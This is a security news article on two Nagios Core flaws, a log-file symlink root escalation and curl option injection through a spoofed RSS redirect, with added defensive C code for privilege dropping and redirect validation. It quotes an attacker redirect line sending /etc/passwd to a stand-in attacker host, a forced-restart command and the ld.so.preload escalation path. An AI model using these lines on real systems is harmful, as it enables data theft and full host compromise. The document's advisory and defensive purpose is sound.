
Information security researcher Dawid Golunski found a serious vulnerability in the popular Nagios IT infrastructure monitoring system. Exploiting it allows an attacker to obtain elevated privileges on the system.
What is the problem
The Nagios Core daemon in versions below 4.2.4 performs unsafe operations when opening its log file. This may allow an attacker to escalate from the nagios system user (in the nagios group) to root, which amounts to a complete compromise of the host on which the monitoring software is installed.
The standard installation of Nagios Core creates a log directory with the following rights:
drwxrwsr-x 5 nagios nagios
The researcher discovered that at startup the Nagios daemon first opens the log file while still running as root and only then drops its root privileges:
8148 open("/usr/local/nagios/var/nagios.log", O_RDWR|O_CREAT|O_APPEND, 0666) = 4
8148 fcntl(4, F_SETFD, FD_CLOEXEC) = 0
8148 fchown(4, 1001, 1001) = 0
8148 getegid() = 0
8148 setgid(1001) = 0
8148 geteuid() = 0
[...]
This means that if an attacker gains access to the 'nagios' account or to another account in the 'nagios' group, he can replace the log file with a symlink to an arbitrary file on the system. This makes it possible to elevate privileges to root, for example by means of a specially crafted /etc/ld.so.preload file.
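The ordering a daemon should use instead, as an added example that is not Nagios code: drop root before the log is opened, and open it with O_NOFOLLOW plus an fstat() check on type and ownership, so that a symlink planted in the group-writable log directory is refused rather than followed. The helper names (drop_privileges, open_log_nofollow, start_logging, demo_symlink_refused) and the temporary-directory self-test are assumptions of this example; it targets Linux with glibc.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <grp.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Irreversibly drop from root to the service account (hypothetical helper,
 * not Nagios code). Order: supplementary groups, then primary gid, then
 * uid, then verify that root cannot be regained. */
int drop_privileges(uid_t uid, gid_t gid)
{
    if (uid == 0)
        return -1;                 /* refusing to "drop" to root */
    if (geteuid() != 0)
        return 0;                  /* already unprivileged: nothing to do */
    if (setgroups(0, NULL) != 0 || setgid(gid) != 0 || setuid(uid) != 0)
        return -1;
    if (setuid(0) == 0)
        return -1;                 /* drop was not permanent: abort */
    return 0;
}

/* Open or create the log file without following a symlink in its place.
 * Returns the fd, or -1 with errno set: ELOOP when a symlink was planted,
 * EPERM when the opened object is not a regular file owned by the service. */
int open_log_nofollow(const char *path, uid_t expected_owner)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_APPEND | O_NOFOLLOW | O_CLOEXEC, 0644);
    if (fd < 0)
        return -1;
    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_uid != expected_owner) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* The safe ordering for a root-started daemon: privileges go first and the
 * log is opened second, so the open itself can never reach root-only files. */
int start_logging(const char *path, uid_t uid, gid_t gid)
{
    if (drop_privileges(uid, gid) != 0)
        return -1;
    return open_log_nofollow(path, uid);
}

/* Self-test on constructed files in a fresh temporary directory: a regular
 * log file is accepted, a symlink planted under another name is refused
 * with ELOOP. Returns 1 when both checks hold, 0 otherwise. */
int demo_symlink_refused(void)
{
    char dir[] = "/tmp/logdemo.XXXXXX";
    if (mkdtemp(dir) == NULL)
        return 0;
    char log[64], link[64];
    snprintf(log, sizeof log, "%s/nagios.log", dir);
    snprintf(link, sizeof link, "%s/planted.log", dir);

    int ok = 0;
    int fd = open_log_nofollow(log, getuid());
    if (fd >= 0) {
        close(fd);
        if (symlink(log, link) == 0) {      /* the swapped-in symlink */
            errno = 0;
            int fd2 = open_log_nofollow(link, getuid());
            ok = (fd2 < 0 && errno == ELOOP);
            if (fd2 >= 0)
                close(fd2);
            unlink(link);
        }
        unlink(log);
    }
    rmdir(dir);
    return ok;
}

int main(void)
{
    printf("symlink in log directory refused: %s\n",
           demo_symlink_refused() ? "yes" : "NO");
    return 0;
}
```

Run as an unprivileged user, the self-test creates a regular log file and a symlink in a temporary directory and confirms that the symlink open fails with ELOOP. start_logging shows the order a root-started daemon should follow: because the open happens only after privileges are gone, it could not have created a root-owned /etc/ld.so.preload even without O_NOFOLLOW; the O_NOFOLLOW and fstat() checks are the second layer for the case where the log directory is writable by the group.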
By default, the file is created with the following ownership and permissions:
-rw-r--r-- 1 nagios nagios 950 Dec 10 11:56 /etc/ld.so.preload
Thus the nagios user can write to it, but members of the nagios group cannot. There is, however, a way for members of this group to obtain write access: the attacker needs to combine the CVE-2016-9565 vulnerability with a flaw in the handling of the Nagios external command file (nagios.cmd).
For the new privileges to take effect, Nagios has to be restarted, and the attacker can provoke that as well by sending the SHUTDOWN_PROGRAM command through the external command interface:
/usr/bin/printf "[%lu] SHUTDOWN_PROGRAM\n" `date +%s` > /usr/local/nagios/var/rw/nagios.cmd
Dawid Golunski also developed a PoC exploit that elevates privileges on the system to the superuser.
CVE-2016-9565
In Nagios 4.2.0, the vulnerability CVE-2008-4796 in the MagpieRSS component was fixed; it allowed arbitrary options to be injected into the curl command line. However, the fix could still be bypassed with double quotes. This new vulnerability received the number CVE-2016-9565 and was finally fixed only in version 4.2.2.
Exploiting the vulnerability consists in altering the internal variable $URI in the _httpsrequest function of the vulnerable component when the local Nagios Core server requests an RSS feed. In some versions of the system the RSS feed is loaded automatically on login. To carry out the attack, the attacker must impersonate www.nagios.org, for example using DNS spoofing or ARP poisoning techniques. It is worth noting that the attack can take on enormous proportions if this domain is spoofed at the scale of large ISP DNS resolvers. After a successful impersonation, the attacker waits for the RSS feed request and answers with an HTTP 302 Redirect whose Location field carries parameters for curl. For example, it might look like this:
Location: https://attackers-host/get-data.php -Fpasswd=@/etc/passwd
Thus an attacker can execute arbitrary commands on the local Nagios server and then use the CVE-2016-9566 vulnerability to escalate local privileges.
It is important to note that the curl invocation includes the -k argument, which disables SSL certificate verification and further simplifies the attacker's task.
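A defensive counterpart to the redirect trick above, as an added example that is not MagpieRSS or Nagios code: the real fix is never to build a shell command line from the URL at all, but a client that follows redirects should also validate the Location value before handing it to anything. The function names, the character policy and the two sample responses below are constructed for this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>

/* Characters allowed in a redirect target: RFC 3986 unreserved and reserved
 * characters plus '%'. The single quote is deliberately left out, and double
 * quotes, whitespace, backslashes and control characters are never accepted:
 * those are exactly the bytes that injected curl options depend on. */
static int is_url_char(unsigned char c)
{
    if (c == '\0' || c > 0x7e)
        return 0;
    if (isalnum(c))
        return 1;
    return strchr("-._~:/?#[]@!$&()*+,;=%", c) != NULL;
}

/* 1 if value is an absolute http(s) URL made only of is_url_char bytes. */
int location_is_safe(const char *value)
{
    if (strncasecmp(value, "http://", 7) != 0 && strncasecmp(value, "https://", 8) != 0)
        return 0;
    for (const unsigned char *p = (const unsigned char *)value; *p; p++)
        if (!is_url_char(*p))
            return 0;
    return 1;
}

/* Copy the value of the first Location header of a raw HTTP response into
 * out (only the header block is inspected; the blank line ends the search).
 * Returns 1 if found and it fits, 0 otherwise. */
int extract_location(const char *response, char *out, size_t outlen)
{
    const char *line = response;
    while (*line) {
        const char *eol = strpbrk(line, "\r\n");
        size_t len = eol ? (size_t)(eol - line) : strlen(line);
        if (len == 0)
            break;                                   /* end of headers */
        if (len > 9 && strncasecmp(line, "Location:", 9) == 0) {
            const char *v = line + 9;
            while (v < line + len && (*v == ' ' || *v == '\t'))
                v++;
            size_t vlen = (size_t)(line + len - v);
            if (vlen >= outlen)
                return 0;
            memcpy(out, v, vlen);
            out[vlen] = '\0';
            return 1;
        }
        if (!eol)
            break;
        line = eol;
        if (*line == '\r') line++;
        if (*line == '\n') line++;
    }
    return 0;
}

/* Verdict for a whole response: 1 = redirect target may be fetched,
 * 0 = it must be refused, -1 = no Location header present. */
int redirect_verdict(const char *response)
{
    char loc[2048];
    if (!extract_location(response, loc, sizeof loc))
        return -1;
    return location_is_safe(loc);
}

/* Constructed sample responses (not captured traffic); the second carries
 * the injected curl options quoted in the article. */
const char *const BENIGN_REDIRECT =
    "HTTP/1.1 302 Found\r\n"
    "Location: https://www.nagios.org/rss/feed.xml\r\n\r\n";
const char *const INJECTED_REDIRECT =
    "HTTP/1.1 302 Found\r\n"
    "Location: https://attackers-host/get-data.php -Fpasswd=@/etc/passwd\r\n\r\n";

int main(void)
{
    printf("benign redirect: %d\n", redirect_verdict(BENIGN_REDIRECT));     /* 1 */
    printf("injected redirect: %d\n", redirect_verdict(INJECTED_REDIRECT)); /* 0 */
    return 0;
}
```

Run over the two constructed responses, the benign nagios.org redirect is accepted and the injected one is refused because of the embedded space; a quote, backslash or control character is refused the same way, and a non-http(s) scheme is refused before any characters are examined. An IDS signature for this vector has to approximate the same policy on the wire, which is why such rules look for option-like tokens inside a Location header rather than for one specific payload.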
How to protect
The fixes for vulnerabilities CVE-2016-9565 and CVE-2016-9566 appeared in versions 4.2.2 and 4.2.4, respectively, therefore, administrators of Nagios servers are strongly recommended to upgrade to the latest version of Nagios.
Positive Technologies experts also developed an IDS signature for detecting attempts to exploit CVE-2008-4796 and CVE-2016-9565 vulnerabilities, publicly available on GitHub and Twitter:
#Nagios Core Curl Command Injection / #RCE
CVE-2016-9565
Affected: <4.2.2 #Suricata rules: https://t.co/vkidBDy3cN
- Attack Detection (@AttackDetection) December 20, 2016